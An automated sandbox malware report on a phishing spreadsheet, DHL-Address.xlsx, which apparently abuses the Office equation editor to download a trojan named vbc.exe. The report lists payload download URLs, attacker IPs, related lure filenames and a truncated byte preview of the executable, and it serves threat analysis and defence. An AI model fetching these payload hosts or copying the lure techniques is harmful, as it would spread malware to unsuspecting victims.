                                          https://ocsp.quovadisoffshore.com0vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://ocsp.entrust.net0Dvbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://cps.chambersign.org/cps/chambersignroot.html0vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://DynDns.comDynDNSvbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://sectigo.com/CPS0vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://crl.entrust.net/server1.crl0vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.ancert.com/cps0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://ca.sia.it/seccli/repository/CRL.der0Jvbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://rca.e-szigno.hu/ocsp0-vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                              		high
                                              https://www.netlock.hu/docs/vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.a-cert.at/certificate-policy.html0;vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.crc.bg0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://crl.chambersign.org/publicnotaryroot.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.a-cert.at/certificate-policy.html0vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.wellsfargo.com/certpolicy0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://secure.comodo.com/CPS0vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.comsign.co.il/cps0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown

                                                      Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      199.193.7.228
                                                      		unknownUnited States
                                                      		22612NAMECHEAP-NETUSfalse
                                                      192.210.214.178
                                                      		unknownUnited States
                                                      		36352AS-COLOCROSSINGUStrue

                                                      General Information

                                                      Joe Sandbox Version:31.0.0 Red Diamond
                                                      Analysis ID:339078
                                                      Start date:13.01.2021
                                                      Start time:13:16:03
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 8m 0s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Sample file name:DHL-Address.xlsx
                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                      Number of analysed new started processes analysed:6
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.expl.evad.winXLSX@6/10@5/2
                                                      EGA Information:Failed
                                                      HDC Information:
                                                      • Successful, ratio: 0.1% (good quality ratio 0.1%)
                                                      • Quality average: 47.3%
                                                      • Quality standard deviation: 33.5%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 113
                                                      • Number of non-executed functions: 8
                                                      Cookbook Comments:
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Found application associated with file extension: .xlsx
                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                      • Attach to Office via COM
                                                      • Scroll down
                                                      • Close Viewer
                                                      Warnings:
                                                      Show All
                                                      • Exclude process from analysis (whitelisted): dllhost.exe
                                                      • Excluded IPs from analysis (whitelisted): 67.26.137.254, 8.248.145.254, 67.26.73.254, 8.248.115.254, 8.253.204.120, 205.185.216.42, 205.185.216.10, 93.184.221.240
                                                      • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, auto.au.download.windowsupdate.com.c.footprint.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, wu.azureedge.net
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      13:17:04API Interceptor91x Sleep call for process: EQNEDT32.EXE modified
                                                      13:17:08API Interceptor885x Sleep call for process: vbc.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      199.193.7.228shipping-document.xlsxGet hashmaliciousBrowse
                                                        iVUeQOg6LO.exeGet hashmaliciousBrowse
                                                          SecuriteInfo.com.Generic.mg.e92f0e2d08762687.exeGet hashmaliciousBrowse
                                                            DHL-document.xlsxGet hashmaliciousBrowse
                                                              wCRnCAMZ3yT8BQ2.exeGet hashmaliciousBrowse
                                                                Mj1eX5GWJxDRnuk.exeGet hashmaliciousBrowse
                                                                  SecuriteInfo.com.Trojan.Inject4.6535.8815.exeGet hashmaliciousBrowse
                                                                    shipping document.xlsxGet hashmaliciousBrowse
                                                                      SecuriteInfo.com.Trojan.Inject4.6512.28917.exeGet hashmaliciousBrowse
                                                                        p72kooG5ak.exeGet hashmaliciousBrowse
                                                                          additional items.xlsxGet hashmaliciousBrowse
                                                                            swift copy 1f354972.exeGet hashmaliciousBrowse
                                                                              DB_DHL_AWB_00117980920AD.exeGet hashmaliciousBrowse
                                                                                Payment Advice - Advice Ref[G20376302776].pptx.exeGet hashmaliciousBrowse
                                                                                  Payment Reminder & SOA 202020121158.exeGet hashmaliciousBrowse
                                                                                    kg.exeGet hashmaliciousBrowse
                                                                                      logo.exeGet hashmaliciousBrowse
                                                                                        Pictures.exeGet hashmaliciousBrowse
                                                                                          7iZX0KCH4C.exeGet hashmaliciousBrowse
                                                                                            Al-Hbb_Doc-EUR_Pdf.exeGet hashmaliciousBrowse
                                                                                              192.210.214.178shipping-document.xlsxGet hashmaliciousBrowse
                                                                                              • globuserinessserverfiletransferprotocol.mangospot.net/vnc/vbc.exe
                                                                                              DHL-document.xlsxGet hashmaliciousBrowse
                                                                                              • globuserinessserverfiletransferprotocol.mangospot.net/vnc/vbc.exe
                                                                                              shipping document.xlsxGet hashmaliciousBrowse
                                                                                              • 192.210.214.178/reg/vbc.exe

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                              smtp.privateemail.comshipping-document.xlsxGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              iVUeQOg6LO.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              SecuriteInfo.com.Generic.mg.e92f0e2d08762687.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              DHL-document.xlsxGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              wCRnCAMZ3yT8BQ2.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              Mj1eX5GWJxDRnuk.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              SecuriteInfo.com.Trojan.Inject4.6535.8815.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              shipping document.xlsxGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              SecuriteInfo.com.Trojan.Inject4.6512.28917.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              p72kooG5ak.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              additional items.xlsxGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              swift copy 1f354972.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              DB_DHL_AWB_00117980920AD.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              Payment Advice - Advice Ref[G20376302776].pptx.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              Payment Reminder & SOA 202020121158.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              kg.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              logo.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              Pictures.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              PO48905232020.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              7iZX0KCH4C.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228

                                                                                              ASN

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                              NAMECHEAP-NETUSNew FedEx paper work review.exeGet hashmaliciousBrowse
                                                                                              • 198.54.122.60
                                                                                              PO-000202112.exeGet hashmaliciousBrowse
                                                                                              • 63.250.34.114
                                                                                              urgent specification request.exeGet hashmaliciousBrowse
                                                                                              • 198.54.117.210
                                                                                              g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                                                                                              • 198.54.117.210
                                                                                              shipping-document.xlsxGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              Project review_Pdf.exeGet hashmaliciousBrowse
                                                                                              • 198.54.117.215
                                                                                              iVUeQOg6LO.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              mscthef-Fichero-ES.msiGet hashmaliciousBrowse
                                                                                              • 162.255.118.194
                                                                                              SecuriteInfo.com.Generic.mg.e92f0e2d08762687.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              Purchase Order -263.exeGet hashmaliciousBrowse
                                                                                              • 162.0.232.59
                                                                                              Duty checklist and PTP letter.exeGet hashmaliciousBrowse
                                                                                              • 162.255.119.136
                                                                                              zz4osC4FRa.exeGet hashmaliciousBrowse
                                                                                              • 162.0.238.245
                                                                                              0XrD9TsGUr.exeGet hashmaliciousBrowse
                                                                                              • 198.54.117.216
                                                                                              DHL-document.xlsxGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              RFQ 41680.xlsxGet hashmaliciousBrowse
                                                                                              • 198.54.117.211
                                                                                              Invoice.exeGet hashmaliciousBrowse
                                                                                              • 162.213.255.55
                                                                                              wCRnCAMZ3yT8BQ2.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              INV2680371456-20210111889374.xlsmGet hashmaliciousBrowse
                                                                                              • 68.65.122.35
                                                                                              INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                                                                                              • 198.54.125.162
                                                                                              al9LrOC8eM.exeGet hashmaliciousBrowse
                                                                                              • 162.213.253.37
                                                                                              AS-COLOCROSSINGUSshipping-document.xlsxGet hashmaliciousBrowse
                                                                                              • 192.210.214.178
                                                                                              1gEpBw4A95.exeGet hashmaliciousBrowse
                                                                                              • 107.172.188.113
                                                                                              IMG_73344332#U00e2#U20ac#U00aegpj.exeGet hashmaliciousBrowse
                                                                                              • 192.210.138.60
                                                                                              DHL-document.xlsxGet hashmaliciousBrowse
                                                                                              • 192.210.214.178
                                                                                              ORDER#9403.exeGet hashmaliciousBrowse
                                                                                              • 198.12.76.78
                                                                                              shipping document.xlsxGet hashmaliciousBrowse
                                                                                              • 192.210.214.178
                                                                                              DHL-ADDRESS.xlsxGet hashmaliciousBrowse
                                                                                              • 192.210.214.177
                                                                                              home.css.ps1Get hashmaliciousBrowse
                                                                                              • 107.175.49.49
                                                                                              DHL ADDRESS.xlsxGet hashmaliciousBrowse
                                                                                              • 192.210.214.177
                                                                                              PolicyUpdate.htmGet hashmaliciousBrowse
                                                                                              • 107.172.191.160
                                                                                              202101041.htmGet hashmaliciousBrowse
                                                                                              • 104.168.28.144
                                                                                              IMG_84755643#U00e2#U20ac#U00aegpj.exeGet hashmaliciousBrowse
                                                                                              • 192.210.138.60
                                                                                              202101041.htmGet hashmaliciousBrowse
                                                                                              • 104.168.28.144
                                                                                              eeFX76545672.htmLGet hashmaliciousBrowse
                                                                                              • 23.94.5.133
                                                                                              PO-JQ1125742021.xlsxGet hashmaliciousBrowse
                                                                                              • 198.12.125.25
                                                                                              TTR payment amount 131,000 USD.xlsxGet hashmaliciousBrowse
                                                                                              • 216.170.114.70
                                                                                              KBC Enquiry No.20201228.xlsxGet hashmaliciousBrowse
                                                                                              • 216.170.114.70
                                                                                              BANK SWIFT.xlsxGet hashmaliciousBrowse
                                                                                              • 216.170.114.70
                                                                                              Payment_details.exeGet hashmaliciousBrowse
                                                                                              • 198.12.76.78
                                                                                              SWIFT COPY AMOUNT OF US 49.676,30 FOR SMX022-10-20 DATED 23122020.xlsxGet hashmaliciousBrowse
                                                                                              • 198.23.207.5

                                                                                              JA3 Fingerprints

                                                                                              No context

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                              Process:C:\Users\Public\vbc.exe
                                                                                              File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                              Category:dropped
                                                                                              Size (bytes):58936
                                                                                              Entropy (8bit):7.994797855729196
                                                                                              Encrypted:true
                                                                                              SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                              MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                              SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                              SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                              SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                              Process:C:\Users\Public\vbc.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):326
                                                                                              Entropy (8bit):3.1132326309774547
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:kKmLZwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:eLWkPlE99SNxAhUegeT2
                                                                                              MD5:1F8086C4F7DE9AC50C354544138EFB63
                                                                                              SHA1:DF1CE6541A5C69D8733233F74788499C244C345C
                                                                                              SHA-256:D38B35A19ECD3018DF239EC1F944BC797B1FC5F9F81BD0EB3BD10CCD30E1637D
                                                                                              SHA-512:110F038BDB200C93D09A7391CD6BD6F8F25A4CF916FD3AAE3E87302B33F58DFBBC82670129A2FA0BA76CA16615F161B41C9678B5A95C533B9F22E99C52501AB3
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview: p...... ........r.......(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:downloaded
                                                                                              Size (bytes):843776
                                                                                              Entropy (8bit):7.300736524263088
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:8XT4rp65D+SL7y7INIIdGZMonTVA2Wsa8tpJKS:VhSJNILZn62WJ8td
                                                                                              MD5:B232B5C7754D932B07C0D47F934EFBFE
                                                                                              SHA1:7C3D92552F6EBAB8956727BEECAAC5D22C87A55B
                                                                                              SHA-256:3311CEA59262B019A69FB72B72A36FC8E55D48A0F14F853B3A52FC8740542E99
                                                                                              SHA-512:4E3ABE570FA413FB74B1EFCF56560D5275CBCAF8217779E46DC65E13C2185C23F0BE2B01B91DCB5AEAD24C6F68E8F84B432B7EFBA87F2CC835BFA2848A406740
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Reputation:low
                                                                                              IE Cache URL:http://globuserinessserverfiletransferprotocol.mangospot.net/csrss/vbc.exe
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._..............P.............>.... ........@.. .......................@............@.....................................O............................ ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................ .......H.......<X...............................................................(....*&..(.....*.s ........s!........s"........s#........s$........*...0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0...........~....o)....+..*&..(*....*...0..<........~.....(+.....,!r...p.....(,...o-...s.............~.....+..*.0...........~.....+..*".......*.0...........(....r=..p~....o/....+..*...0..<........~.....(+.....,!rG..p.....(,
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\102D7B51.jpeg
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                              Category:dropped
                                                                                              Size (bytes):48770
                                                                                              Entropy (8bit):7.801842363879827
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                              MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                              SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                              SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                              SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5B636490.emf
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                              Category:dropped
                                                                                              Size (bytes):1099960
                                                                                              Entropy (8bit):2.0152876288887174
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:WXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:EahIFdyiaT2qtXw
                                                                                              MD5:6DAD8275F83B986347FE666567C7FFD0
                                                                                              SHA1:51F5A7972D7E082B5EE36B2680EEA2EE75BBFEEE
                                                                                              SHA-256:03B22F8AD84430F5C1064C38D88F66F2A224BF97DDC82A21AAB379C6078B917D
                                                                                              SHA-512:32BB953D0F9DB9FA01FA1874A229766EB6ED57F177B18748899EC32375DB070AC32C7DBFBA08305F69C81401135397651D2FED6B4FFFC93844734BEB1E8E7106
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview: ....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................)...).......).t.)..N.R..)...).....\.)...)..N.R..)...). ....ySQ..)...). .........E..zSQ............?...............................X...%...7...................{ .@................C.a.l.i.b.r...............).X.....). .)..2LQ........\.).\.)..{JQ......)...E.dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FC5A891E.jpeg
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                              Category:dropped
                                                                                              Size (bytes):48770
                                                                                              Entropy (8bit):7.801842363879827
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                              MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                              SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                              SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                              SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                              C:\Users\user\AppData\Local\Temp\CabCFB4.tmp
                                                                                              Process:C:\Users\Public\vbc.exe
                                                                                              File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                              Category:dropped
                                                                                              Size (bytes):58936
                                                                                              Entropy (8bit):7.994797855729196
                                                                                              Encrypted:true
                                                                                              SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                              MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                              SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                              SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                              SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                              C:\Users\user\AppData\Local\Temp\TarCFB5.tmp
